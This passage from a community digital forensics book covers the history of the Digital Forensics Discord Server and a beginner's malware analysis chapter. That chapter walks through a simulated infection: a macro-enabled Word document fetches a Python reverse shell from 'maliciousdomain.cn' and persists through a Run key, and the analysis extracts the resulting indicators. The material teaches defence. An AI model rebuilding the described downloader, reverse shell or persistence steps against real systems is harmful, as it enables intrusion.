⁴⁴https://en.wikipedia.org/wiki/Internet_Relay_Chat
⁴⁵https://en.wikipedia.org/wiki/Freenode
⁴⁶https://www.teeltech.com/
⁴⁷https://groups.google.com/g/physical-mobile-forensics/about?pli=1
⁴⁸https://en.wikipedia.org/wiki/AIM_(software)
⁴⁹https://en.wikipedia.org/wiki/Windows_Live_Messenger
Chapter 1 - History of the Digital Forensics Discord Server 16
Throughout the next year and a half, a small contingent of 7-15 people occupied this IRC channel at
any given time. We became a tight-knit group of examiners who relied on each other’s knowledge
and expertise to navigate challenges in our everyday casework. These problems often would relate to
performing advanced acquisition methods using Chip-Off, JTAG, or flasher boxes. The collaboration
was exactly what I was looking for, because together we were able to cast a wider net when searching
for the knowledge we needed to solve the problems we faced in our everyday investigations.
I recall utilizing an application called HexChat⁵⁰ to access this IRC channel. I’d have HexChat open
at all times along with my everyday workflow of software applications to perform my duties as a
Detective. For those reading this who have not used IRC before, know that’s its nowhere near as
feature rich as Discord. Discord is much more modern and IRC has been around since the early days
of the internet as we know it today. I bring this up because often we needed to share pictures with
each other as an exhibit for a problem we were encountering during the acquisition or decoding
process of a mobile device.
⁵⁰https://hexchat.github.io/
Chapter 1 - History of the Digital Forensics Discord Server 17
Move to Discord
Truthfully, I had forgotten this detail I’m about to share, but one of our moderators’ reminder brought
it all back to me. One of the main catalysts for moving from IRC was the fact that I was really
annoyed with having to upload a picture to Imgur and share the link on the IRC channel. It seemed so
inefficient and the process grew stale for me. I had created a Discord account back in September 2016
to join various special interest servers, so I had a fair amount of exposure to Discord’s capabilities
prior to the birth of the Digital Forensics Discord Server on March 26th, 2018.
I recall having aspirations for a move to Discord months prior to March 2018. For those who didn’t
use Discord around this time, it was primarily a platform marketed towards gamers. Using it for
things other than gaming wasn’t the intended purpose at the time, but the functionality it had was
everything I wanted in a chat client. Take all of the good features from every other chat application
I had used up until that point in time and add even more quality of life features and an awesome
mobile application, and I was sold. Discord was a breath of fresh air.
My call to move to Discord was met with nearly unanimous approval from members of the IRC
channel. As a result, the Mobile Forensics Discord Server was created!
Mobile Forensics Discord Server ⇒ Digital Forensics
Discord Server
The Mobile Forensics Discord Server enjoyed great success and rapid growth throughout its first year
of existence. The server’s growth was entirely driven by word of mouth and advertising on various
Google Groups. The list of channels maintained in the server were driven by member requests
which quickly expanded outside of mobile devices. Over time, it became increasingly apparent that
branding the server as a Mobile Forensics server did not fully encompass the needs of the DFIR
community. To the best of my research, the Mobile Forensics Discord Server was rebranded to the
Digital Forensics Discord Server sometime around February 2019.
Since then, multiple channels have been added, renamed, and removed at the request of members.
Chapter 1 - History of the Digital Forensics Discord Server 18
Member Growth
Throughout the 4 years (as of this writing), the Digital Forensics Discord Server has undergone
substantial growth. Below are some major membership milestones mined from my messages in the
#announcements channel over time.
Major Milestones
Date Member Count
3/26/2018 3
3/29/2018 116
4/3/2018 142
4/6/2018 171
4/11/2018 200
4/13/2018 250
5/30/2018 300
6/28/2018 375
7/9/2018 400
7/25/2018 450
8/20/2018 500
9/27/2018 600
11/16/2018 700
12/6/2018 800
1/10/2019 900
2/1/2019 1000
5/8/2019 1500
10/4/2019 2000
1/30/2020 2500
3/27/2020 3000
5/22/2020 4000
3/26/2021 6800
8/2/2021 8000
1/29/2022 9000
3/26/2022 9500
6/29/2022 10000
Chapter 1 - History of the Digital Forensics Discord Server 19
Hosting the 2020 Magnet Virtual Summit
In early 2020, shortly after the COVID-19 pandemic began, I was approached by representatives from
Magnet Forensics inquiring about the possibility of providing a centralized location for attendees
of the Magnet Virtual Summit 2020 to chat during presentations. Enthusiastically, we accepted the
idea and began to plan the logistics of hosting what likely would become a large influx of members.
I seem to recall nearly 1500 members joining during the month long Magnet Virtual Summit 2020.
In retrospect, it’s clear that this was one of the first indicators that the server had “made it” in the
eyes of the community. Not only was the 2020 Magnet Virtual Summit a massive success in many
ways, but I also strongly feel its success influenced other conferences and entities to go virtual as well
as to adopt Discord as the means of communication for attendees. For instance, the SANS 2020 DFIR
Summit hosted a Discord server for their attendees a couple months after the 2020 Magnet Virtual
Summit hosted on the Digital Forensics Discord Server. I would like to think of the 2020 Magnet
Virtual Summit as a proof of concept for collaboration and communication among conference staff,
presenters, and attendees that succeeded beyond our expectations and influenced how conferences
were virtualized in 2020 and beyond.
Community Engagement Within the Server
One of the biggest divides that the Digital Forensics Discord Server was able to bridge was that
between customers and vendors. I recall spending a lot of time emailing every vendor I knew
of to provide representation in the server due to untapped potential in customer and vendor
communications that simply didn’t exist at the time. Four years into the life of the server,
representatives from multiple digital forensic software vendors are mainstays in their products’
channels, providing an unprecedented amount of instant feedback between the customer and the
vendor. Historically, support was provided by email via a ticketing system, a vendor’s forum, or
another means that lacked the instant feedback mechanism that Discord provides. Not only are
customers able to interact directly with digital forensic software vendor employees who can provide
meaningful answers to help move a case forward, but the vendors can also receive product feedback
and observe interactions between examiners (their customers) and better understand how they can
better serve those using their products.
I have no possible way to quantify this statement, but I would like to think overall there has been
a net positive influence on commonly utilized digital forensic software as a result of this direct
interaction with the customer base within the Digital Forensic Discord Server’s channels.
Chapter 1 - History of the Digital Forensics Discord Server 20
Impact on the DFIR community
In this section, I want to share some unique stories from people who have joined the Digital Forensics
Discord Server and what impact it has had on them.
One of the earliest stories I can remember is from someone who identified themselves as a detective
in Alaska. Specifically, this person stated they were a one-man digital forensics team at a police
department in a remote part of Alaska. They did not have another tech-savvy person to run ideas
past that was fewer than 3 hours away by car. Upon joining the Digital Forensics Discord Server,
they said that the community provided exactly what they needed. Prior to joining the server, they
were operating solo with no one to bounce ideas off when challenges arose in their investigations.
When I was a detective, I always had at least 2 other people in my office to run ideas past or ensure
I wasn’t forgetting something simple when I ran into roadblocks in my analyses. I can only imagine
the feeling of isolation of having my closest support being over 3 hours away from me. The Digital
Forensics Discord Server was a game changer because it provided something this person desperately
needed: support!
More recently, someone joined the server from country for which I had never expected to have to
assign a Law Enforcement role. Someone posted in the #role-assignment channel stating they were
a police officer in Iraq. In a prior life, I was in the United State Marine Corps. I had actually served a
combat tour in Iraq in the infantry back in 2006-2007. Never in a million years would I have imagined
that someone from Iraq serving in Law Enforcement would join the Digital Forensics Discord Server.
To this day, this person is the only one occupying the Law Enforcement [Iraq] role, but when this
person joined the server I felt I had come full-circle. I engaged in conversation with this individual
and asked for updates on how the country was doing. It really warmed my heart, in all honesty. I
met so many wonderful people in that country during my 7-month deployment. To think that the
country is in a place to join the 73 other countries who have roles within the server put a smile on
my face and still does to this day.
Chapter 1 - History of the Digital Forensics Discord Server 21
Law Enforcement Personnel
Being former Law Enforcement myself, I understand the importance of jurisdiction and how laws
can differ from one jurisdiction to another. As a result, Law Enforcement roles were separated by
country from the early stages of the server for the purpose of delineating members from each other
due to various legal considerations that may vary from one jurisdiction to another. Because of that,
enumerating a list of the countries that a Law Enforcement role has been created for is likely the best
way to establish the reach the Digital Forensics Discord Server has in the global DFIR community.
Countries with roles assigned for Law Enforcement personnel are listed below:
As of November 2022:
Albania Iran Peru
Argentina Iraq Philippines
Australia Ireland Poland
Austria Israel Portugal
Bangladesh Italy Romania
Belgium Jamaica Royal Cayman Islands
Bosnia Japan Russia
Brazil Korea Senegal
Canada Latvia Seychelles
Chile Lithuania Singapore
China Luxembourg Slovakia
Columbia Malaysia Slovenia
Croatia Maldives Spain
Cyprus Malta Sweden
Czech Republic Mauritius Switzerland
Denmark Mexico Taiwan
Dominican Republic Monaco Turkey
Estonia Mongolia Ukraine
Finland Myanmar United Arab Emirates
France Nepal United Kingdom
Germany Netherlands Uruguay
Greece New Zealand USA
Grenada Nigeria Vietnam
Iceland Norway
India Pakistan
To save you from counting, that’s 73 countries with a dedicated Law Enforcement role. This means
at least one person who has identified themselves as working in Law Enforcement in each of these
countries has joined the server and had this role assigned to them. With 195 countries⁵¹ recognized
in the world as of the writing of this book, the server has a reach into approximately 37% of those!
⁵¹https://www.worldatlas.com/articles/how-many-countries-are-in-the-world.html
Chapter 1 - History of the Digital Forensics Discord Server 22
Forensic 4:cast Awards
The Digital Forensics Discord Server was fortunate enough to enjoy success in the Forensic 4:cast
Awards⁵², as seen below:
Year Category Result
2020 Resource of the Year Winner⁵³
2021 Resource of the Year Winner⁵⁴
2022 Resource of the Year Winner⁵⁵
Future
The Digital Forensics Discord Server will continue to live and thrive so long as the community
wills it. I will always be active, but this server is and always has been far more than any single
person. As long as the members of the DFIR community keep showing up and engaging with each
other, the Digital Foreniscs Discord Server will never die…unless Discord ceases to exist, forcing the
community to migrate to a different platform. Let’s hope that doesn’t happen anytime soon!
All indications are that the server will continue to grow through coworker word-of-mouth, exposure
through training courses, and university programs sharing invites to the server to students. The
server has always been welcoming to all, from the high school student wanting to work in DFIR
someday, to people who’ve been involved in DFIR for decades, and everyone in between. This will
not ever change.
Administrator Contingency Plan
This server has become such an important part of my life (and the DFIR community) that I’ve created
a contingency plan. For those who are new to administering Discord servers, one important thing to
know is that only the member who is assigned as the Server Owner can delete the server. Currently,
that person is me, Andrew Rathbun. In the interest of ensuring the Digital Forensics Discord Server
lives far beyond all of us (assuming Discord is still around by that time), I’ve established a paper
trail for any other moderators to follow should anything happen to me and render me unable to
log back in to Discord. This paper trail will require a lot of effort and coordination with family
members/friends of mine to access my password vault and many other necessary items in order
to Transfer Ownership⁵⁶ so that the server can live on without any administrative hiccups. In the
unfortunate event that I can no longer log back into Discord, a OneNote page has been shared with
other moderators providing breadcrumbs to obtain the necessary information to transfer ownership
to another moderator so the server can be properly taken care of.
⁵²https://forensic4cast.com/forensic-4cast-awards/
⁵³https://forensic4cast.com/forensic-4cast-awards/2020-forensic-4cast-awards/
⁵⁴https://forensic4cast.com/forensic-4cast-awards/2021-forensic-4cast-awards/
⁵⁵LinkTBD
⁵⁶https://support.discord.com/hc/en-us/articles/216273938-How-do-I-transfer-server-ownership
Chapter 1 - History of the Digital Forensics Discord Server 23
Conclusion
Thank you to everyone who has helped this server become such an integral part of the DFIR
community.
Chapter 2 - Basic Malware Analysis
By ApexPredator⁵⁷ | Discord⁵⁸
Introduction
Malware has been around for as long as computers have been in common use. Any computer
program that performs malicious activities is classified as malware. There are many types of
malware ranging from sophisticated self-propagating worms, destructive logic bombs, ransomware,
to harmless pranks. Everyone who regularly uses a computer will encounter malware at some point.
This chapter will cover the basics of analyzing malware on an infected computer. It is targeted
towards beginners who are new to Digital Forensics and Incident Response (DFIR) and hobbyists.
The goal of this chapter is to teach someone unfamiliar with the basic concepts of malware analysis
some Tactics, Techniques, and Procedures (TTPs) used to confirm that a computer is infected with
malware and how to begin extracting Indicators of Compromise (IOCs). It will cover the use of basic
tools. We will not cover intermediate or advanced topics such as reverse engineering malware to
discover its purpose or how it works in this chapter.
The chapter starts with an introduction to basic malware analysis. It then covers some free tools
to use in basic malware analysis. The chapter culminates with a walkthrough of a canned analysis
on a piece of malware. The walkthrough wraps up with recommendations on where to go next to
progress to intermediate or advanced malware analysis.
I had numerous instances of friends and family asking me to figure out why their computer was
acting weird long before moving in to cybersecurity and receiving formal training on malware
analysis. I have had other cybersecurity professionals ask why it is not a waste of time to learn to
build Microsoft Office macro-based payloads when Microsoft is making it harder for users to run
the malicious code inside to which I always respond with “Never underestimate the users desire
and ability to download and run anything sent to them.” People are going to download and execute
malware at some point and if you are the IT expert they will ask you to figure out what happened.
⁵⁷https://github.com/ApexPredator-InfoSec
⁵⁸http://discordapp.com/users/826227582202675210
Chapter 2 - Basic Malware Analysis 25
One of my first instances of basic malware analysis was when I was in a situation that required
using a computer shared by multiple people to access the internet. I erred on the paranoid side before
using it to access any of my personal accounts and ran a network packet capture using Microsoft‘s
NetMon, which is a packet capture tool similar to Wireshark. I noticed from the packet capture that
the machine was communicating with a Chinese domain which appeared unusual. I then conducted
a quick Google search on the domain and found that it was associated with a piece of malware.
The site I found listed out additional IOCs which enabled me to check running processes to find
that I had the malicious executable running. I was then able to kill the process with Task Manager.
I was also able to review the registry with Regedit and delete the registry key that was created by
the malware to establish persistence. I was then able to notify the other users of the machine that
it had malware running on it that steals information such as account credentials. The machine was
then reimaged to ensure all of the malware was removed and the machine was back to a known
good state. Next, we will cover some of the basic tools that you can use to perform the same type of
simple analysis.
Basic Malware Analysis Tools
This section covers free tools that can be used for basic malware analysis to identify if a machine has
been infected with malware. You can use these tools to extract IOCs to share with the community or
to include in an Incident Response report in a professional setting. We will start with built in tools
that you probably already know and discuss how to use them for basic malware analysis.
Task Manager is a built in Windows tool that allows you to view running processes. You can use it
to view running processes and how much resources they are using. On Windows 10, right click the
task bar and select Task Manager from the menu to launch the Task Manager. On Windows 11, click
the Windows Start Menu icon and type Task Manager to search for the Task Manager app. You may
then need to click the drop down arrow entitled More details.
Chapter 2 - Basic Malware Analysis 26
You can use this tool to find suspicious processes running on the machine. More sophisticated
Malware will attempt to blend in by using the names of common legitimate programs, however,
if you have a specific process name from an IOC you can easily look to see if it is running. Each
process also has an arrow you can click to expand to show child processes.
There are also Startup and Services tabs that allow you to review processes that are set to run
on startup and the list of installed services. You can review the Startup tab to help identify simple
persistence mechanism of malware to find applications that run on startup that are uncommon or
should not be included. This same process can be done on the Services tab to find suspicious services
installed on the machine. These tabs show you the same information that you would get by running
Startup Apps or services.msc independently from Task Manager.
Chapter 2 - Basic Malware Analysis 27
Chapter 2 - Basic Malware Analysis 28
You can pull up the details for each service listed in the Services tab or from services.msc. It will
list the Startup type which is either Manual, Automatic, or Disabled. The Automatic startup type
services will start automatically when the computer boots up Windows. You can also find the path
to the executable that the service runs and what user or context it runs under. These details are
useful IOCs for malicious services installed by malware.
Chapter 2 - Basic Malware Analysis 29
Process Explorer⁵⁹ (procexp.exe and procexp64.exe) from the Sysinternals Suite is another free tool
that provides a greater level of detail than the built in Task Manager in Windows. It provides the
same functionality to kill processes while providing additional details in the main window. You can
submit hashes to VirusTotal through Process Explorer to help determine if a process is malicious.
⁵⁹https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer
Chapter 2 - Basic Malware Analysis 30
Right clicking on the process and selecting Check VirusTotal will prompt you to accept submitting
hashes of the suspected process to VirusTotal. After selecting yes on the prompt, the VirusTotal box
on the image tab will contain a link to the VirusTotal results of the submitted hash. In this case, the
legitimate Microsoft Print Spooler executable spoolsv.exe was submitted and resulted in 0 out of 73
Antivirus vendors detecting it as malicious.
Process Explorer also has a tab to review TCP/IP connections listing listening addresses and ports
or outbound communications made by the process. This helps a malware analyst determine if the
process is listening or receiving on any network ports. This can help find IOCs for Command and
Control (C2) or even data exfiltration.
Chapter 2 - Basic Malware Analysis 31
The Strings tab is another great feature that allows you to list the strings embedded in the binary
just like the strings command in Linux. This is useful for finding IOCs and determining some of the
capabilities of the malware. You may be able to find IPs or domain names that are coded in to the
application. Or you may find strings that point to dangerous Windows API calls that can hint at the
executable being malicious. The Sysinternals Suite can be downloaded here⁶⁰.
System Informer, formerly Process Hacker, is another great tool that performs similar functions to
⁶⁰https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
Chapter 2 - Basic Malware Analysis 32
Task Manager and Process Explorer. It will provide you the same level or process details and group
the processes in a parent/child process layout like Process Explorer. Right clicking a process in System
Informer allows you to terminate a process just like in Task Manager and Process Explorer. Right
clicking and selecting Send to provided an option to send the process executable or dll to VirusTotal
similar to Process Explorer.
System Informer includes a Modules tab when right clicking and selecting properties on a process.
This Modules tab lists all of the modules loaded and in use by the process. This is helpful for finding
additional IOCs or identifying malicious dll files used by a suspicious process.
Chapter 2 - Basic Malware Analysis 33
System Informer provides Services and Network tabs that offer similar functionality to the features
covered under Task Manager and Process Explorer. A malware analyst can use the Services tab to
search for suspicious services and review the details of the service. The Network tab can be used
to map running processes to active network connections and listening ports. System Informer is
available for download at https://github.com/winsiderss/systeminformer.
Chapter 2 - Basic Malware Analysis 34
Chapter 2 - Basic Malware Analysis 35
Process Monitor⁶¹, or Procmon, is another tool included in the Sysinternals Suite that is useful for
monitoring processes. Procmon goes beyond the process information provided by Task Manager,
Process Explorer, or System Informer. It details every action taken by the process allowing in-depth
analysis of suspicious or malicious processes. Procmon will quickly overload an analyst with data
unless filters are used to filter out the noise. It enables an analyst to find IOCs and understand what
actions the malware has taken on the system.
⁶¹https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
Chapter 2 - Basic Malware Analysis 36
ProcDOT is useful for filtering and displaying the results from Procmon. ProcDOT allows an analyst
to ingest the logs generated from a Procmon capture saved in a CSV file. The analyst can then select
the desired process from the imported CSV file and ProcDOT will generate an interactive graph.
Chapter 2 - Basic Malware Analysis 37
This effectively filters out the noise of unrelated processes giving the analyst an easy-to-follow graph
that displays all actions conducted by the malware to include those of child processes spawned by
the original process. It also allows to ingest packet captures to correlate with Procmon. ProcDOT
can be downloaded here⁶².
The netstat⁶³ tool included in Windows is another useful tool. You can use it to list all listening ports
and established connections. You can review the connections and listening ports with the command
netstat -ano. This command includes the process ID of the process using that listed port to help
you correlate a suspicious connection to a process.
⁶²https://www.procdot.com/downloadprocdotbinaries.htm
⁶³https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat
Chapter 2 - Basic Malware Analysis 38
The tasklist⁶⁴ command can be used to list running process and their associated process ID from the
command line. This can help you enumerate suspicious processes without needing to use a Graphical
User Interface (GUI). It is helpful when used in conjunction with netstat to look up the process ID
found with a suspicious network connection. The below screenshot lists that PID 4 listening on port
445 (RPCSMB) on all interfaces (0.0.0.0) is the System process. In this case it is a legitimate process
and listening port combination. The System process also always loads at PID for so if it were a PID
other than 4 that would be unusual and a potential IOC.
⁶⁴https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist
Chapter 2 - Basic Malware Analysis 39
Another way to do the same analysis is to use the TCPView⁶⁵ tool from Sysinternals Suite. The
TCPView tool provides the same information received from netstat -ano and tasklist /SVC in a
convenient and easy to read GUI. This allows you to quickly identify suspicious listening ports or
connections and correlate them to the corresponding process. The remote address listed in TCPView
and netstat is another useful IOC to include in your analysis.
⁶⁵https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview
Chapter 2 - Basic Malware Analysis 40
Wireshark is a valuable tool to conduct more in-depth packet analysis. Wireshark enables a malware
analyst to view all network traffic sent and received on the suspected machine. An analyst can filter
the packets by IP, port, protocol, or many other options. Filtering by DNS protocol enables an analyst
to find DNS queries to malicious sites used for Command and Control (C2) of malware. The domains
found in the DNS queries are useful IOCs to determine if the machine is compromised.
Wireshark provides capabilities to conduct more advanced analysis of malware communication. It
allows an analyst to identify C2 traffic hidden in protocols such as DNS. It also enables an analyst to
extract data such as second stage binaries or infected text documents downloaded by the malware.
Using a proxy in combination with Wireshark enables an analyst to export the certificate and keys
used to encrypt Transport Layer Security (TLS) encrypted traffic to recover the plaintext data sent
between malware and attacker-controlled servers.
Chapter 2 - Basic Malware Analysis 41
The malware analysis walkthrough in this chapter will focus on using Wireshark to perform basic
analysis tasks. This includes reviewing DNS queries to identify suspicious domain lookups and
plaintext commands/passwords sent during malware communication. More advanced usage of
Wireshark is out of scope of basic malware analysis and is saved for future writings on intermediate
and advanced malware analysis. Wireshark can be downloaded here⁶⁶. Microsoft’s NetMon is an
alternative to Wireshark, but is only available for download from archive⁶⁷ and is no longer being
developed.
Regedit is another useful tool built in to Windows. Regedit gives the ability to view and edit the
Windows registry. It can be used for basic malware analysis to search for persistence mechanism
such as entries in HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun or
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun. Applications listed in
the run keys will auto start when a user logs in to the machine and is sometimes used by malware
to establish persistence.
⁶⁶https://www.wireshark.org/
⁶⁷https://www.microsoft.com/en-us/download/4865
Chapter 2 - Basic Malware Analysis 42
Regshot is useful for determining what changes an application makes to the Windows registry when
it is executed. Regshot allows an analyst to take a snapshot of the Windows registry before and after
executing a suspicious application and generates a comparison of the two snapshots. This is useful
when analyzing a suspicious application in a controlled lab setting. Regshot can be downloaded
here⁶⁸. However, Regshot is no longer being actively maintained. NirSoft provides an alternative to
Regshot that is capable of handling registry comparisons. NirSoft’s RegistryChangesView can be
found here⁶⁹. The malware analysis portion of this chapter will still use Regshot.
⁶⁸https://github.com/Seabreg/Regshot
⁶⁹https://www.nirsoft.net/utils/registry_changes_view.html
Chapter 2 - Basic Malware Analysis 43
Certutil is another tool built in to Windows that is useful for malware analysis. An analyst can use
certutil to generate a hash of a file to compare it to a known malicious file hash. This can indicate
if a file is malicious without having to execute it to investigate what it does. An analyst can use
the hashes generated by cerutil as IOCs once a suspicious file is determined to be malicious thru
analysis.
Chapter 2 - Basic Malware Analysis 44
Certutil⁷⁰ is used in the above screenshot to generate the SHA1, MD5, and SHA256 hashes of cmd.exe.
A malware analyst can compare these hashes to the hashes of the known legitimate versions of
cmd.exe installed with Windows. The analyst can also submit these hashes to VirusTotal to see if it
is a known malicious file.
An analyst can also use automated tools for analysis. Multiple tools mentioned already have features
to upload files or hashes to VirusTotal. A suspicious file can be uploaded to VirusTotal⁷¹. VirusTotal
is an online system that will execute the file in a sandbox to attempt to determine if it is malicious
or not. It will then provide file hashes and IOCs an analyst can use to identify the file. VirusTotal
also shares uploaded files with Antivirus vendors to use for building detection signature.
⁷⁰https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
⁷¹https://www.virustotal.com/gui/home/upload
Chapter 2 - Basic Malware Analysis 45
Antiscan.me⁷² is another option an analyst can use to analyze a suspected file. Antiscan.me only
checks uploaded files against 26 different Antivirus vendors. It also does not share the files with the
Antivirus vendors. This makes it a good option if you are analyzing a file that you do not want to
be shared with other organizations.
⁷²https://antiscan.me/
Chapter 2 - Basic Malware Analysis 46
Basic Malware Analysis Walkthrough
It is time to do a walkthrough of a sample malware analysis now that you are familiar with some of
the tools used for malware analysis and their capabilities. The walkthrough will teach how to use
some of the tools mentioned in this chapter. It will not use any tools not previously mentioned.
In this scenario a user has reported to you that their machine has been running slow and acting
“weird”. You have already conducted initial investigations by asking the user questions including:
Chapter 2 - Basic Malware Analysis 47
“When did the issues start?”, “Did you download or install any new applications?” and “Did you
click any links or open any documents from untrusted sources?” The user states that they did not
install any application recently but did review a Microsoft Word document sent from a customer.
We start our analysis with opening TCPView from the Sysinternals Suite to determine if we can
quickly find any unusual processes communicating to remote sites. In this simple scenario, we find
that there is currently only one process, python.exe, communicating to a remote system. We flag
this as suspicious since Python is not typically used in the manner for our fictitious network. We
then make a note of the port and IP for potential IOCs.
We can verify this using the other tools covered early as well. Netstat -ano lists an established
connection between our test machine and the simulated attacker machine with local IP/port
192.168.163.131:63590 and remote IP/port 192.168.163.128:8443 from the process with PID 6440.
Tasklist /SVC lists that python.exe is running as PID 6440.
Chapter 2 - Basic Malware Analysis 48
Process Explorer can also be used to verify the findings. Right clicking on python.exe, selecting
Properties, and then selecting the TCP/IP tab lists the connection to 192.168.163.128:8443. System
Informer provides another easy means to find the unusual connection and correlate it to the
python.exe process by selecting the Network tab.
Chapter 2 - Basic Malware Analysis 49
Chapter 2 - Basic Malware Analysis 50
We have verified that there is unusual network traffic on the potentially compromised machine and
need to dig deeper into the traffic. We then open up Wireshark to review a packet capture of the
incident. We use the IP and port combination (ip.addr == 192.168.163.128 and tcp.port == 8443)
to filter the traffic down to the currently interesting packets. The traffic is not encrypted which will
allow us to extract plaintext communications.
Chapter 2 - Basic Malware Analysis 51
We then right click on one of the packets and select follow TCP stream to pull up the conversation in
a readable format. This confirms that this is a malicious process used to create a reverse shell to the
attacker. We are able to identify commands sent by the attacker and the response from the infected
machine.
Chapter 2 - Basic Malware Analysis 52
The attacker ran a series of command to enumerate identifying information about the machine and
what privileges the user account has. The attacker then attempts to establish persistence by creating
a service named NotBackDoor to auto start the malware containing the reverse shell. This action
failed leading the attacker to then attempt persistence by creating a run key in the system registry
for the current user and was successful.
Chapter 2 - Basic Malware Analysis 53
At this point we have verified that there is malware present on the system and it is actively being
exploited by a remote attacker. We immediately take action to isolate the machine to cut off access
from the attacker and protect the rest of the network. In this scenario we would just simply block
the IP and port on the perimeter firewall and remove the infected machine from the network before
continuing our analysis.
We then take steps to confirm the persistence measures taken by the attacker. We review the services
in services.msc to verify that NotBackDoor service was not successfully created. Then we take a
look to ensure no other unusual service exist. The NotBackDoor service name and the binPath option
of C:Python27python.exe C:WindowsTasksbdw.py are still noted as IOCs since the attacker did
attempt to create the service and it could be present on other infected machines if access was granted.
Chapter 2 - Basic Malware Analysis 54
Regedit is then used to verify the run key created after verifying that no malicious services exist. We
do find a NotBackDoor key that points to C:Python27python.exe C:WindowsTasksbdw.py. We
make note of this as an IOC. We also note that C:WindowsTasks is commonly used as a location to
drop malware due to low privilege users being able to write to the location and is common excluded
from protections such as application whitelisting since it is located under C:Windows.
Chapter 2 - Basic Malware Analysis 55
The next step for this scenario is to navigate to the C:WindowsTasks folder to investigate the
bdw.py file mentioned in the previous steps. The investigation finds that this is just a simple Python
script to establish a reverse shell from the infected computer to the attacker’s machine. We are
able to determine that it contains the port number 8443 but it is pointing to a domain name of
maliciousdomain.cn instead of IP.
Chapter 2 - Basic Malware Analysis 56
We add this domain to the list of IOCs. We could have also identified the traffic associated with this
domain if we had started this investigation by looking for suspicious DNS calls. The .cn root domain
indicates this is a Chinese domain and if we are in a scenario where traffic to China is abnormal
then this is a potential red flag.
Chapter 2 - Basic Malware Analysis 57
We know that bdw.py is malicious and provided a remote attacker access to the infected machine,
but we do not yet know how it got there. We see that the document the user stated they received
from a new customer ends with the extension .docm. This informs us that the document contains
macros which could be the initial infection vector (IIV). Analysis on this file needs to be done in an
isolated lab to prevent any reinfection.
The document in this scenario contains only one line of text stating that it is a generic document
for a malware analysis walkthrough. We could search for unique strings in the document that could
be used for IOCs in a real-world scenario to help others determine if they have received the same
document. The next step is to check the documents for macros.
Click View in the ribbon menu at the top of the document. Then select the Macros button and
click the Edit button in the window that pops up. We find that this document does contain a
simple macro that uses PowerShell to download bdw.py from maliciousdomain.cn. The macro then
executes bdw.py to initiate the initial reverse shell connection. The macro contains the AutoOpen and
Document_Open subroutines to run the downloader when the document is opened. We have now
verified that Doc1.docm is a downloader used to infect the system with a Python-based reverse shell.
We add Doc1.docm to our list of IOCs.
Chapter 2 - Basic Malware Analysis 58
We could have started our analysis with the Doc1.docm document that was mentioned by the user.
This would have given us the info to track down the reverse shell that we had found by analyzing the
network traffic and processes earlier. Running Wireshark while executing the macro helps us find the
DNS calls to the maliciousdomain.cn. We can also extract the bdw.py script from the HTTP stream
since it was download unencrypted via HTTP. This can be useful in instances were more advanced
malware downloads another stager and then deletes the stager from the system after running its
payload.
Chapter 2 - Basic Malware Analysis 59
We can also use the built in certutil.exe tool to generate hashes for the malware files to use for
IOCs. Run certutil -hashfile Dco1.docm SHA256 to generate a SHA256 hash of the document. You
can also generate an MD5 hash and generate the hashes for the bdw.py. These are useful IOCs for
signature-based systems to detect the presence of the malware.
Chapter 2 - Basic Malware Analysis 60
We can use Procmon and ProcDOT to verify that the malicious files did not spawn any additional
processes that need to be investigated. The ProcDOT graph shows us that the python.exe process
communicated over TCP to IP 192.168.163.128 and spawned a cmd.exe process. We can see the
commands that were run in the cmd.exe process in the graph and verify that no additional files
or processes were created.
We can verify if any other registry settings are changed by executing the Word document macro on
our test machine. We use Regshot to take a snapshot before and after opening the document. We
then open the comparison of the snapshots to review the changes. Start Regshot then click 1st shot
and then shot.
Chapter 2 - Basic Malware Analysis 61
We then open the malicious Word document. We execute the macro allowing it to download the
bdw.py reverse shell from out attacker webserver and then add our persistence registry key under
HKCUSoftwareMicrosoftWindowsCurrentVersionRun. Then we click 2ⁿ shot in Regshot and select
shot. This takes the second snapshot and allows us to click the compare button to compare the
snapshots.
This produces a .txt document listing all of the registry changes that occurred between the
snapshots. It contains a lot of noise and can be tedious to sort through. We can verify that the
Chapter 2 - Basic Malware Analysis 62
persistence mechanism was added. We can find evidence that the user clicked the Enable Content
button allowing the macro to run. This found by searching for TrustRecords to find an entry that
lists the malicious document added to the TrustRecords key.
We can include automated analysis by uploading the document to VirusTotal to determine if it is
detected as malicious by any of the Antivirus vendors. VirusTotal lists 30 out of 62 vendors detected
the document as malicious with most of the detections flagging it as a downloader. This matches
what we determined from our own analysis.
Chapter 2 - Basic Malware Analysis 63
Analysis Wrap-Up
We have now completed analyzing the system to verify that it is infected with malware. We
determined what the malware does and we have extracted IOCs to implement in our defensive
tools to detect future infection attempts. The machine will need to be reimaged before returning it
to the user for use to ensure all malware has been eradicated. It is important to ensure a forensic
image is taken before reimaging the system if evidence preservation is needed to legal cases or future
investigations. To recap our IOCs:
• Downloader macro in document title Doc1.docm
• Unique string “This is a generic document for a malware analysis walkthrough” in Doc1.docm
• Second stage Python reverse shell named bdw.py stored in C:WindowsTasks
• Service named NotBackDoor to auto start bdw.py
Chapter 2 - Basic Malware Analysis 64
• HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunNotBackDoor registry key to
autorun bdw.py
• SHA256 hash of Doc1.docm - 6fa2281fb38be1ccf006ade3bf210772821159193e38c940af4cf54fa5aaae78
• Md5 hash of Doc1.docm - b85e666497ea8e8a44b87bda924c254e
